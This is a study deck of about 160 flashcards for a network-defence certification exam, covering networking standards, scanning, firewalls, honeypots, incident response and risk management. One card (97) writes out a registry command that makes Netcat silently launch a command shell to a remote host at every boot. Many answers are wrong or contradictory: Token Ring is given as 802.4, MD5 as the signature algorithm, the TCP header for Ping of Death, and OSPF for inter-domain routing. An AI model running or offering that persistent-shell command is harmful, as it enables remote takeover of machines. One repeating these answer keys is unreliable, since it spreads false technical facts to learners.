Study CND Flashcards

1
Q

What is the bit size of the Next Header field in the IPv6 header format?

A

8 Bits

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
Which of the following is a presentation layer protocol?
A. TCP
B. RPC
C. BGP
D. LWAPP
A

Answer: D

LWAPP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What IEEE standard is Fast Basic Service Set Transition? And what does it do?

A

802.11r is the standard to permit continuous connectivity aboard wireless devices in motion, with fast and secure handoffs from one base station to another, managed in a seamless manner.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

__________ is a congestion control mechanism that is designed for unicast flows operating in an Internet environment and competing with TCP traffic?

A

TCP Friendly Rate Control

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is the IEEE-SA for wireless personal area networks?

A

802.15

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Which layer performs routing of IP datagrams?

A

Internet Layer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
Which of the following layers performs routing of IP datagrams?
A. Transport layer
B. Link layer
C. Application layer
D. Internet layer
A

Internet layer

Answer: D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
Which of the following standards defines Logical Link Control (LLC)?
A. 802.2
B. 802.3
C. 802.5
D. 802.4
A

802.2

Answer: A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q
Which of the following protocols supports source-specific multicast (SSM)?
A. DHCP
B. ARP
C. DNS
D. BGMP
A

BGMP

Answer: D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
Token Ring is standardized by which of the following IEEE standards?
A. 802.2
B. 802.4
C. 802.3
D. 802.1
A

802.4 is the standard for Token Ring

Answer: B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q
Which of the following is an example of a network providing DQDB access methods?
A. IEEE 802.3
B. IEEE 802.2
C. IEEE 802.4
D. IEEE 802.6
A

802.6 - Local and Metropolitan Area Networks: Distributed Queue Dual Bus (DQDB) Subnetwork of a Metropolitan Area Network (MAN)

Answer: D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q
Which of the following IEEE standards defines the demand priority access method?
A. 802.15
B. 802.3
C. 802.12
D. 802.11
A

802.12

Answer: C

has to do with 100 Mbit Wifi on demand access. Probably not on the test. MAN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
Which of the following IEEE standards adds QoS features and multimedia support?
A. 802.11b
B. 802.11e
C. 802.5
D. 802.11a
A

802.11e

Answer: B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Which of the following OSI layers is sometimes called the syntax layer?

A

Presentation layer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q
Which of the following IEEE standards defines the token passing ring topology?
A. 802.4
B. 802.5
C. 802.3
D. 802.7
A

802.5

Answer: B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
Which of the following IEEE standards defines a physical bus topology?
A. 802.4
B. 802.5
C. 802.6
D. 802.3
A

802.4

Answer: A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q
Which of the following fields in the IPv6 header replaces the TTL field in the IPv4 header?
A. Next header
B. Traffic class
C. Hop limit
D. Version
A

Hop Limit

Answer: C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
What is the response of an Xmas scan if a port is either open or filtered?
A. RST
B. No response
C. FIN
D. PUSH
A

NO Response

Answer: B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

CSMA/CD is specified in which IEEE standard?

A

802.3

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Which of the following protocols sends a jam signal when a collision is detected?

A

CSMA/CD

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q
Which of the following protocols is used in wireless networks?
A. CSMA
B. CSMA/CD
C. ALOHA
D. CSMA/CA
A

CSMA/CA

Answer: D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

TCP SYN scanning is also known as

A

half-open scanning

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

You are a professional Computer Hacking forensic investigator. You have been called to collect
evidences of buffer overflow and cookie snooping attacks. Which of the following logs will you
review to accomplish the task?
A. Program logs
B. Web server logs
C. Event logs
D. System logs

A

A. Program logs

C. Event logs
D. System logs

Answer: D, C, and A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Jason diagnoses the internals of his computer and observes that some changes have
been made in Sam’s computer registry. To rectify the issue, Jason has to restore the registry. Which of
the following utilities can Jason use to accomplish the task? Each correct answer represents a
complete solution. Choose all that apply.
A. Reg.exe
B. EventCombMT
C. Regedit.exe
D. Resplendent registrar

A

A. Reg.exe

C. Regedit.exe
D. Resplendent registrar

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

The Distance Vector Multicast Routing Protocol (DVMRP) is used to …

A

share information between routers to transport IP Multicast packets among networks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

______________ is an enumeration technique used to glean information about computer systems
on a network and the services running its open ports.

A

Banner Grabbing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

The Data Link Switching Client Access Protocol (DCAP) is an application layer
protocol that is used between workstations and routers for

A

transporting SNA/NetBIOS traffic over

TCP sessions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

Honeynet is a prime example of

A

a high-interaction honeypot.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

Two or more honeypots on a network

form a

A

honeynet.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary’s intelligence collection capabilities identified in the previous action?
A. Analysis of Threats
B. Application of Appropriate OPSEC Measures
C. Identification of Critical Information
D. Analysis of Vulnerabilities
E. Assessment of Risk

A

D. Analysis of Vulnerabilities

Analysis of Vulnerabilities: It includes examining each aspect of the planned operation to identify
OPSEC indicators that could reveal critical information and then comparing those indicators with the
adversary’s intelligence collection capabilities identified in the previous action

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q
Which of the following protocols is used for inter-domain multicast routing and natively supports
"source-specific multicast" (SSM)?
A. BGMP
B. DVMRP
C. OSPF
D. EIGRP
A

BGMP
BGMP stands for border gateway multicast protocol. It is used for inter-domain multicast routing and
natively supports “source-specific multicast” (SSM). In order to support “any-source multicast”
(ASM), BGMP builds shared trees for active multicast groups. This allows domains to build sourcespecific,
inter-domain, distribution branches where needed. BGMP uses TCP as its transport protocol,
which helps in eliminating the need to implement message fragmentation, retransmission,
acknowledgement, and sequencing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

What did the 802.11e enhancement to 802.a and 802.b provide?

A

QOS prioritization of voice data video transmissions

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

Which of the OSI Seven Layers establishes, manages terminates connections between local and remote applications.

A

Session

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

Which of the following are used as a cost estimating technique during the project planning
stage? Each correct answer represents a complete solution. Choose three.
A. Function point analysis
B. Program Evaluation Review Technique (PERT)
C. Expert judgment
D. Delphi technique

A

D. Delphi technique
C. Expert judgment
A. Function point analysis

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

Which of the following IP class addresses are not allotted to hosts

A

Class D 224 - 239 reserved for multicasting

Class E 240 -255 experimental

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

Which of the following IEEE standards provides specifications for wireless ATM systems?

A

802.11a

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

Which of the following is the type of documented business rule for protecting information and the
systems, which store and process the information
A. Information protection policy
B. Information protection document
C. Information storage policy
D. Information security policy

A

Information security policy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q
Which of the following UTP cables supports transmission up to 20MHz?
A. Category 2
B. Category 5e
C. Category 4
D. Category 1
A

Category 4

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q
Which of the following is also known as slag code?
A. Trojan
B. Logic bomb
C. Worm
D. IRC bot
A

Logic Bomb

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q
Which of the following is susceptible to a birthday attack?
A. Authentication
B. Integrity
C. Authorization
D. Digital signature
A

Digital Signature

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q
Which of the following wireless networks provides connectivity over distance up to 20 feet?
A. WMAN
B. WPAN
C. WLAN
D. WWAN
A

WPAN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q
Which of the following networks interconnects devices centered on an individual person's
workspace?
A. WLAN
B. WPAN
C. WWAN
D. WMAN
A

WPAN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q
Which of the following is a symmetric 64-bit block cipher that can support key lengths up to 448 bits?
A. HAVAL
B. BLOWFISH
C. IDEA
D. XOR
A

Blowfish

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q
Which of the following protocols is used to exchange encrypted EDI messages via email?
A. S/MIME
B. MIME
C. HTTP
D. HTTPS
A

S/MIME

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q
Which of the following are provided by digital signatures?
A. Identification and validation
B. Authentication and identification
C. Integrity and validation
D. Security and integrity
A

Authentication and Validation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q
Which of the following is a passive attack?
A. Unauthorized access
B. Traffic analysis
C. Replay attack
D. Session hijacking
Answer: B
A

Traffic Analysis

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q
Which of the following is a malicious program that looks like a normal program?
A. Impersonation
B. Worm
C. Virus
D. Trojan horse
A

Trojan Horse

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q
Which of the following is an IPSec protocol that can be used alone in combination with Authentication Header (AH)?
A. L2TP
B. PPTP
C. ESP
D. PPP
A

ESP

Encapsulating Security Payload protocol

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q
Which of the following attacks combines dictionary and brute force attacks?
A. Replay attack
B. Man-in-the-middle attack
C. Hybrid attack
D. Phishing attack
A

Hybrid Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q
Which of the following attacks comes under the category of an active attack?
A. Replay attack
B. Wireless footprinting
C. Passive Eavesdropping
D. Traffic analysis
A

Replay Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q
Which of the following encryption techniques do digital signatures use?
A. MD5
B. RSA
C. Blowfish
D. IDEA
A

MD5

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q
Which of the following header fields in TCP/IP protocols involves Ping of Death attack?
A. SMTP header field
B. TCP header field
C. IP header field
D. UDP header field
A

TCP Header Field

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q
Which of the following modems offers wireless communication under water?
A. Controllerless modem
B. Short haul modem
C. Acoustic modem
D. Optical modem
A

Acoustic modem

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

Which of the following protocols is used by the Remote Authentication Dial In User Service (RADIUS)
client/server protocol for data transmission?
A. DCCP
B. FTP
C. FCP
D. UDP

A

UDP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q
Which of the following applications is used for the statistical analysis and reporting of the log files?
A. Sawmill
B. Sniffer
C. Snort
D. jplag
A

Sawmill

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q
Which of the following is a Cisco product that performs VPN and firewall functions?
A. Circuit-Level Gateway
B. PIX Firewall
C. IP Packet Filtering Firewall
D. Application Level Firewall
A

PIX Firewall

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q
Which of the following is also known as stateful firewall?
A. PIX firewall
B. Stateless firewall
C. DMZ
D. Dynamic packet-filtering firewall
A

Dynamic packet-filtering firewall

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q
Which of the following is a centralized collection of honeypots and analysis tools?
A. Production honeypot
B. Honeynet
C. Research honeypot
D. Honeyfarm
A

Honeyfarm

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q
Which of the following routing metrics is the sum of the costs associated with each link traversed?
A. Routing delay
B. Communication cost
C. Bandwidth
D. Path length
A

Path Length

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q
Which of the following honeypots is a useful little burglar alarm?
A. Backofficer friendly
B. Specter
C. Honeynet
D. Honeyd
A

Backofficer friendly

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q
What is the location of honeypot on a network?
A. Honeyfarm
B. Honeynet
C. Hub
D. DMZ
A

DMZ

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q
Which of the following is an open source implementation of the syslog protocol for Unix?
A. syslog-os
B. syslog Unix
C. syslog-ng
D. Unix-syslog
A

syslog-ng

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q
Which of the following protocols is a more secure version of the Point-to-Point Tunneling Protocol (PPTP) and provides tunneling, address assignment, and authentication?
A. IP
B. L2TP
C. PPP
D. DHCP
A

L2TP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q
Which of the following sets of incident response practices is recommended by the CERT/CC?
A. Prepare, notify, and follow up
B. Notify, handle, and follow up
C. Prepare, handle, and notify
D. Prepare, handle, and follow up
A

Prepare, handle, and follow up

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q
Which of the following tools scans the network systems for well-known and often exploited
vulnerabilities?
A. Nessus
B. SAINT
C. SATAN
D. HPing
A

SATAN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q
Which of the following tools examines a system for a number of known weaknesses and alerts the
administrator?
A. Nessus
B. COPS
C. SATAN
D. SAINT
A

COPS

67
Q

Which of the following is the full form of SAINT?
A. System Automated Integrated Network Tool
B. Security Admin Integrated Network Tool
C. System Admin Integrated Network Tool
D. System Administrators Integrated Network Tool

A

System Administrators Integrated Network Tool

68
Q
Which of the following is a type of VPN that involves a single VPN gateway?
A. Remote-access VPN
B. Extranet-based VPN
C. PPTP VPN
D. Intranet-based VPN
A

Extranet-based VPN

69
Q
Which of the following is a free security-auditing tool for Linux?
A. SAINT
B. SATAN
C. Nessus
D. HPing
A

Nessus

70
Q
Which of the following types of RAID is also known as disk striping?
A. RAID 0
B. RAID 2
C. RAID 1
D. RAID 3
A

RAID 0

71
Q
Which of the following is a process of transformation where the old system can no longer be
maintained?
A. Disaster
B. Risk
C. Threat
D. Crisis
A

Crisis

72
Q
Which of the following phases is the first step towards creating a business continuity plan?
A. Business Impact Assessment
B. Scope and Plan Initiation
C. Business Continuity Plan Development
D. Plan Approval and Implementation
A

Scope and Plan Initiation

73
Q
Which of the following types of RAID offers no protection for the parity disk?
A. RAID 2
B. RAID 1
C. RAID 5
D. RAID 3
A

RAID 3

74
Q
Which of the following processes helps the business units to understand the impact of a disruptive
event?
A. Plan approval and implementation
B. Business continuity plan development
C. Scope and plan initiation
D. Business impact assessment
A

Business impact assessment

75
Q
Which of the following is a network analysis tool that sends packets with nontraditional IP stack
parameters?
A. Nessus
B. COPS
C. SAINT
D. HPing
A

HPING

76
Q
Which of the following protocols is a method of implementing virtual private networks?
A. OSPF
B. PPTP
C. IRDP
D. DHCP
A

PPTP

77
Q

Which of the following attacks are computer threats that try to exploit computer application
vulnerabilities that are unknown to others or undisclosed to the software developer? Each correct
answer represents a complete solution. Choose all that apply.
A. Buffer overflow
B. Zero-day
C. Spoofing
D. Zero-hour

A

Zero Day
and
Zero Hour

78
Q

Which of the following is a service discovery protocol that allows computers and other devices to
find services in a local area network without prior configuration?
A. NTP
B. SLP
C. NNTP
D. DCAP

A

SLP

Service Location Protocol

79
Q

In L2TP ______________ tunnel mode, the ISP must

support L2TP, whereas in L2TP tunnel mode, the ISP does not need to support L2TP.

A

compulsory

80
Q
Which of the following tools examines a system for a number of known weaknesses and alerts the administrator?
SAINT
Nessus
SATAN
COPS
A

Should have chosen

COPS

81
Q

Which of the following routing metrics refers to the length of time that is required to move a packet from source to destination through the internetwork?

Bandwidth
Path length
Routing Delay
Load

A

Routing Delay

82
Q

Your company is outgrowing its current facility and plans to relocate within the next year. You need to provide management with guidance on selecting an appropriate new location. You are compiling a list of location considerations. Which is NOT a consideration.

proximity to roads
neighboring buildings
emergency exits
utility systems

A

emergency exits

83
Q

You are designing the site-to-site VPN topology. You want to connect all branches to the main office while preventing direct connections between branch offices. Which topology should you choose?

hub and spoke
star
mesh
ring

A

star

84
Q

You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company’s network. Which type of Internet access policy is currently implemented?

Paranoid
Prudent
Permissive
Promiscuous

A

Promiscuous

85
Q

Recently, an attacker was able to connect to a wireless access point as a client and eavesdrop on the traffic to obtain address information. Which type of wireless attack has occurred?

ad-hoc connection attack
AP MAC spoofing
misconfigured access point attack
evil twin attack

A

AP MAC spoofing

86
Q

In the process of evaluating the QoS features of VPN products, you become concerned with the ratio of data packets sent versus all packets. What is this called?

packet loss
Delay
Jitter
Goodput

A

Goodput

87
Q
You are using Nmap to perform a vulnerability assessment. Which of the following procedures would help to create a map of the network?	
ping sweep
Service discovery
port scan
OS fingerprinting
A

ping sweep

88
Q

Which of the following third party encryption tools can perform on the fly encryption (OTFE)?

Open Puff
AxCrypt
Wireshark
Veracrypt

A

Veracrypt

89
Q

You would like to connect your sniffer to a switch and capture all traffic going through the switch. Which of the following features could you use?

VTP
802.1q
DAI
RAP
STP
SPAN
A

RAP

SPAN

90
Q

During which stage of the IH&R process is a vulnerability analysis performed?

Eradication and Recover
Post-Incident Activities
Forensic Investigation
Containment

A

Eradication and Recover

91
Q

With which of the following flag sets does the Xmas tree scan send a TCP frame to a remote device?
Response:

RST
PUSH
FIN
URG

A

PUSH
FIN
URG

92
Q

Which of the following is the logical entity that enables programming code or software to operate in a virtualization solution?

Response:

virtual machine
hypervisor
execution environment
host operating system

A

execution environment

93
Q

What is the second phase in the vulnerability management process?

Remediation
Asset prioritization
Verification
Assessment

A

Asset prioritization

94
Q

Which of the following are the responsibilities of the disaster recovery team?

correct answer represents a complete solution. Choose all that apply.

To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts

To initiate the execution of the disaster recovery procedures

To monitor the execution of the disaster recovery plan and assess the results

To notify management, affected personnel, and third parties about the disaster

A

To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts

To initiate the execution of the disaster recovery procedures

To monitor the execution of the disaster recovery plan and assess the results

To notify management, affected personnel, and third parties about the disaster

95
Q

You are deploying a network IDS, and your main concern is to monitor surges in traffic that may indicate a DoS attack. Where should you place the sensors?

in the DMZ
on major backbones
on critical subnets
behind the external firewall

A

on major backbones

96
Q

Which wireless IPS will raise its risk indicator to 100% if an AP were discovered to be running with no encryption?

A

AirMobile Server

97
Q

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe”

What task do you want to perform by running this command?

Response:

You want to put Netcat in the stealth mode.
You want to set the Netcat to execute command any time.
You want to perform banner grabbing.
You want to add the Netcat command to the Windows registry.

A

You want to put Netcat in the stealth mode.
You want to set the Netcat to execute command any time.
You want to add the Netcat command to the Windows registry.

98
Q

Management is concerned that your Linux email server can become the victim of a DoS attack. Which of the following hardening recommendations will help reduce this possibility?

Use DNSBL servers.
Activate SPF.
Configure reverse DNS lookup.
Limit the number of connections.

A

Limit the number of connections.

99
Q

Management is concerned that an attacker will be able to access the /etc/shadow password file on a Linux server. When the Linux server was installed, the default permissions for this file were used. For this reason, you are not concerned.

What are the default permissions for this file?

500
400
600
700

A

400

100
Q

You may need to know how to change permissions in numeric code in Linux, so to do this you use numbers instead of “r”, “w”, or “x”.

What are the eight permission combinations of Owner, Group, User

0 = No Permission
1 = Execute
2 = Write
4 = Read
A

Permission numbers are:

0 = ---
1 = --x
2 = -w-
3 = -wx
4 = r-
5 = r-x
6 = rw-
7 = rwx

example
chmod 744

101
Q

Which of the following protocols is used for exchanging routing information between two gateways in a network of autonomous systems?

IGMP
EGP
OSPF
ICMP

A

OSPF

102
Q

Which of the following functions becomes possible when using quantitative risk analysis?

risk elimination
cost/benefit analysis
risk prioritization
risk identification

A

Cost/Benefit analysis

103
Q

Which of the following standards does a cloud service provider has to comply with, to protect the privacy of its customer’s personal information?

ISO/IEC 27020
ISO/IEC 27021
ISO/IEC 27018
ISO/IEC 27019

A

ISO/IEC 27018

104
Q

Which group in ISO/IEC 27001 includes communications security controls?

Response:

A.6

A.15

A.5

A.13

A

A.13

105
Q

Which wireless discovery tool uses the Windows command netsh wlan show networks mode=bssid to get wireless information?

NetStumbler
Vistumbler
InSSIDer
NetSurveyor

A

Vistumbler

106
Q

Business Coninuity Plan

A

provides measures for sustaining essential business operations while recovering from significant disruption

107
Q

Business Recovery Plan

A

provides measures for recovering business operations immediately following a disaster

108
Q

Continuity of Operation plan

A

provides measures and capabilities to maintain organizational essential, strategic functions at an alternate site for up to 30 days

109
Q

It provides measures and capabilities for recovering a major application or general support system.

A

Contingency Plan

110
Q

It provides measures for disseminating status report to personnel and the public

A

Crisis Commuication Disaster recovery planPlan

111
Q

It provides detailed measures to facilitate recovery of capabilities at an alternate site.

A

Disaster recovery plan

112
Q

What are the three layers of computer network defense (CND)?

people, assets, and technology
assets, operations, and technology
people, operations, and technology
people, operations, and assets

A

people, operations, and technology

113
Q

In which phase of the NIST Risk Management framework are security controls tailored to the needs of the organization?

Authorize
Select
Categorize
Monitor

A

Select

114
Q

Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another?

BGP
ICMP
SNMP
IGMP

A

ICMP

115
Q

You are assessing security needs for several hosts according to their purpose in the network. Which of the following factors would NOT affect security considerations for the hosts?

network services provided by the host
category of information stored on the host
operating system of the host
security requirements needed for information

A

operating system of the host

116
Q

Which sniffing tool is a command-line tool?

Dsniff
Capsa
Tcpdump
ColaSoft

A

tcpdump

117
Q

Sally needs to encrypt a document so that only Bob can decrypt it. What key should she use for this?

Bob’s public key
Sally’s public key
Sally’s private key
Bob’s private key

A

Bob’s Public Key

118
Q

Which of the following is true of security policies and baselines?

Security policies define the structure of the baseline.
Baselines define the structure of the security policy.
Policies are specific to the operating system.
Baselines are not specific to the operating system.

A

Baselines define the structure of the security policy

119
Q

Which of the following is NOT an IDS system?

Peek and Spy
Snort
Vanguard Enforcer
KFSensor

A

KFSensor (windows IPS)

120
Q

Identify the firewall technology that monitors the TCP handshake between the packets to determine whether a requested session is legitimate.

Packet Filtering Firewall
Circuit Level Gateway
Stateful Multilayer Inspection
Network Address Translation

A

Circuit Level Gateway

121
Q

During IH&R, the____________and containment processes can run at the same time.

Solution :

forensic analysis or forensic investigation

Determine whether the given solution is correct?

Response:

Correct
OR ?
Incorrect

A

correct

122
Q

During which phase of the vulnerability management process are rogue devices typically discovered?

Asset Prioritization
Discovery
Reporting
Assessment

A

Discovery

123
Q

Which of the following does NOT occur during the Post-incident Activity stage of IH&R?

Perform a damage assessment and document incident costs.
Update the incident handling policy.
Return the affected system to normal operation.

A

Return the affected system to normal operation.

124
Q

In which of the following levels of vulnerability management does scanning occur?

Assessment
Discovery
Asset prioritization
Remediation

A

Assessment

125
Q

At what layer of the OSI model do packet-filtering firewalls operate?

Layers 2 and 3
Layers 4 and 5
Layers 5 and 6
Layers 3 and 4

A

Layers 3 and 4

126
Q

Which of the following is a standard-based protocol that provides the highest level of VPN security?

PPP
IPSec
L2TP
IP

A

IPSec

127
Q

Which of the following forensic investigation roles examines the evidence acquired and determines what is useful to the investigation?

incident analyser
expert witness
evidence manager
evidence investigator

A

evidence investigator

128
Q

Which of the following should the first responder document prior to escalating an incident?

handling procedures
data about the affected system
containment actions
IRT contact information

A

data about the affected system

129
Q

Your sniffer just detected one device sending another a packet with the SYN flag set in the TCP header. What flags would you expect to be set in the packet the receiving device sends back to the sender?

SYN
ACK
SYN and ACK
RST

A

SYN and ACK

130
Q

Which tool ensures integrity of system files though the use of a cron job?

Trustwave
Tripwire
Code Green Networks TrueDLP
McAfee Total Protection for Data Loss

A

Tripwire

131
Q

Which policy defines the data sensitivity labels and the guidelines for processing, storing, and transmitting sensitive data?

acceptable use policy
network connection policy
information protection policy
information system security policy

A

information protection policy

132
Q

Which of the following firewalls are used to track the state of active connections and determine the network packets allowed to enter through the firewall?

Each correct answer represents a complete solution. Choose all that apply.

Dynamic packet-filtering
Stateful
Proxy server
Circuit-level gateway

A

Dynamic packet-filtering and

Statefull

133
Q

The Tripwire tool is used for what function?

file integrity verification
intrusion detection
data loss prevention
log collection

A

file integrity verification

134
Q

Which phase of vulnerability management deals with the actions for patching the discovered vulnerabilities?

Verification
Mitigation
Remediation
Assessment

A

Remediation

135
Q

Which of the following is a mandatory password-based and key-exchange authentication protocol?

DH-CHAP
PPP
CHAP
VRRP

A

DH-CHAP

136
Q

You use the following filter in Wireshark:

(tcp.flags==0x02) && (tcp.window_size <1025)

What type of traffic is the filter trying to locate?

TCP ACK scans
TCP SYN scans
OS fingerprinting
TCP SYN ACK packets

A

OS fingerprinting

137
Q

Which of the following IDS tools performs packet filtering using Berkeley Packet Filtering commands?

AIDE
SNARE
Vanguard Enforcer
Snort

A

Snort

138
Q

Your company recently implemented an internal public key infrastructure (PKI). Because you need to ensure that all of the PKI components are secure, you are currently researching the vulnerabilities of the entity that signs the certificates.

Which entity are you examining?

a principal
a verifier
an issuer
a subject

A

an issuer

139
Q

Which of the following is NOT a suspicious TCP packet?

one with only the SYN flag set and data
one with the SYN and FIN flags set
one with the destination port of zero
one with only the SYN flag set and no data

A

one with only the SYN flag set and no data

140
Q

Which of the following tools is used to ping a given range of IP addresses and resolve the host name of the remote system?

Nmap
SuperScan
Netscan
Hping

A

Superscan

141
Q

Your company decides to implement a new wireless network for employees who use mobile devices. You have been asked to determine which wireless deployment will provide the fastest throughput. Which of the following should you recommend?

  1. 11g
  2. 11ac
  3. 11n
  4. 11ad
A

802.11ad

142
Q

Which Wi-Fi discovery tool is built specifically for the Apple MAC OS?

Aircheck Wi-Fi tester
Xirrus -Fi Inspector
AirRadar 2
Wellenreiter

A

AirRadar 2

143
Q

Your company implements an authentication mechanism on their website whereby customers need to enter the hidden letters in a distorted image to confirm their identity. Which type of knowledge factor authentication is being used?

PIN
challenge response
Passphrase
security question

A

Challenge Response

144
Q

What is the third step in the patch management process?

Assess
Deploy
Detect
Acquire

A

Acquire

145
Q

Which of the following can only be done with an asymmetric algorithm?

data integrity
digital signature
generate hash values
data encryption

A

digital signature

146
Q

Which of the following statements are NOT true about the FAT16 file system?

correct answer represents a complete solution. Choose all that apply.

It does not support file-level security.
It supports file-level compression.
It works well with large disks because the cluster size increases as the disk partition size increases.
It supports the Linux operating system.

A

It supports file-level compression.

It works well with large disks because the cluster size increases as the disk partition size increases.

147
Q

During which stage of the IH&R process is a vulnerability analysis performed?

Post-Incident Activities
Eradication and Recover
Forensic Investigation
Containment	
Eradication and Recover
A

Eradication and Recover

148
Q

Which of the following protocols is used to share information between routers to transport IP Multicast packets among networks?

Response:

LWAPP
DVMRP
RSVP
RPC

A

DVMRP

Distance Vector Multicast Routing Protocol

149
Q

Which of the following is true of content-based signatures?

Response:

Signatures are in packet payloads.
Signatures are in packet headers.
Packet analysis is enough to detect signatures.
Multiple packet analysis is required.

A

Signatures are in packet payloads.

150
Q

Which computer network defense (CND) approach examines the root cause or reasons for network attacks?

detective approach
retrospective approach
preventive approach
reactive approach

A

Should have chosen

retrospective appoach

151
Q

Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password?

Aircrack
Ettercap
BackTrack
AirSnort

A

Ettercap

152
Q

You are reviewing your company’s application development policies. Which of the following should NOT be part of this?

Use standard application configuration baselines during development.

Implement secure coding review.
Ensure only authorized personnel can install software on all hosts.
Use standard secure coding practices and principles during development.

A

Use standard application configuration baselines during development.

153
Q

You need to test the strength of the WPA PSK password used in your WLAN. Which tool could you use for this?

Net Surveyor
NetStumbler
Vistumbler
Wireless Security Auditor

A

Wireless Security Auditor

154
Q

You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company’s network. Which type of Internet access policy is currently implemented?

Permissive
Promiscuous
Paranoid
Prudent

A

Promiscuous

155
Q

Which of the following protocols uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets?

PPTP
SSTP
ESP
LWAPP

A

PPTP

156
Q

Which of the following does NOT affect the severity of an incident?

service criticality
incident impact
incident duration
information confidentiality

A

information confidentiality

157
Q

Which of the following sniffers can operate on multi-network cards, such as ISDN and ADSL?

Dsniff
Capsa
ColaSoft Packet Sniffer
Colasoft Network Sniffer

A

Should have chosen

ColaSoft Packet Sniffer

158
Q

In which of the following transmission modes is communication uni-directional?

Full-duplex mode
Half-duplex mode
Root mode
Simplex mode

A

Simplex Mode

159
Q

You suspect an attacker recently performed a UDP scan of the network. You would like to look for traffic that would verify this. How should you set the filter in Wireshark?

icmp. type==3 and ICMP code==3
tcp. flags== 0x003
udp. dtspport==7
icmp. type==8

A

icmp.type==3 and ICMP code==3

160
Q

Which of the following is a network interconnectivity device that translates different communication protocols and is used to connect dissimilar network technologies?

Switch
Gateway
Bridge
Router

A

Gateway

161
Q

Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems?

IEEE
CCITT
ICANN
NIST

A

CCITT

162
Q

At which level of virtualization does SAN technology operate?

file system
storage device
Fabric
server

A

Fabric

163
Q

Which of the following recovery plans includes specific strategies and actions to deal with specific variances to assumptions resulting in a particular security problem, emergency, or state of affairs?

Contingency plan
Continuity of Operations Plan
Business continuity plan
Disaster recovery plan

A

Contingency plan

164
Q

